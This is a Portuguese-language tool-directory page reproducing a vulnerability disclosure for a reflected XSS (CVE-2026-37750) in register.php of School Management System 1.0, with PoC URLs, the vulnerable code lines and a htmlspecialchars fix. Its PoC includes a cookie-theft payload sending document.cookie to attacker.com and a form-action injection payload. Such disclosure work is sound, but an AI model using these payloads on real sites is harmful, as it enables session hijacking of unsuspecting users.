Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-37750 — Prova de conceito de XSS refletido para o School Management System 1.0, demonstrando execução de JavaScript não autenticada por meio do parâmetro type em register.php, com análise de impacto e orientações de remediação. | Kitploit
Ferramentas/GitHubGitHub/menevarad007/cve-2026-37750
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAprendizado e Educação
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

Prova de conceito de XSS refletido para o School Management System 1.0, demonstrando execução de JavaScript não autenticada por meio do parâmetro type em register.php, com análise de impacto e orientações de remediação.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-37750 — School Management System 1.0 - XSS Refletido

Detalhes

CampoInformação
ID CVECVE-2026-37750
TipoCross-Site Scripting (XSS) Refletido
SeveridadeMédia (CVSSv3: 6.1)
Fornecedormahmoudai1
ProdutoSchool Management System
Versão1.0
DescobridorVarad AP Mene
Data2026-04-16
CWECWE-79

Descrição

Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido no School Management System 1.0 por mahmoudai1 permite que atacantes remotos não autenticados executem JavaScript arbitrário nos navegadores das vítimas através do parâmetro type não sanitizado em register.php. O parâmetro é refletido sem escape dentro de uma tag h1 na linha 22 e dentro de um atributo action de formulário na linha 26. Nenhuma autenticação é necessária para explorar esta vulnerabilidade.

ID CVE: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 Média (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Descrição do Produto

O School Management System 1.0 é uma aplicação web PHP/MySQL por mahmoudai1 no GitHub usada para gerir alunos, professores e pais em escolas.

URL do Fornecedor: https://github.com/mahmoudai1/school-management-system


Ficheiro Vulnerável

register.php — Formulário de registo (sem autenticação necessária)


Código Vulnerável

Linha 22: echo ucfirst($_REQUEST['type'])

Linha 26: echo $_REQUEST['type']

Nenhum htmlspecialchars() usado — entrada bruta do utilizador refletida diretamente no HTML.


Prova de Conceito

Pré-requisitos:

  • Nenhuma autenticação necessária
  • O alvo deve estar a executar o School Management System 1.0

Passo 1 — Abra o navegador e visite este URL: http://target/register.php?type=script-alert-document.cookie-/script

Passo 2 — O JavaScript é executado no navegador Resultado: Uma caixa de alerta é exibida mostrando os cookies de sessão.

Passo 3 — Payload de roubo de cookies: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Passo 4 — Payload de injeção no atributo action do formulário: http://target/register.php?type="-script-alert(1)-/script

Dois pontos de injeção confirmados:

Ponto de Injeção 1 — Dentro da tag h1 (linha 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Saída:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Ponto de Injeção 2 — Dentro do atributo action do formulário (linha 26):

root@kitploit:~
echo $_REQUEST['type']

Saída:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Impacto

  • Sequestro de sessão através de roubo de cookies
  • Phishing — injetar formulários de login falsos
  • Distribuição de malware através de redirecionamentos
  • Nenhuma autenticação necessária

Correção

Correção da linha 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Correção da linha 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


Referências

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Descobridor

Varad AP Mene Email: [email protected] GitHub: https://github.com/menevarad007

Baixar ferramenta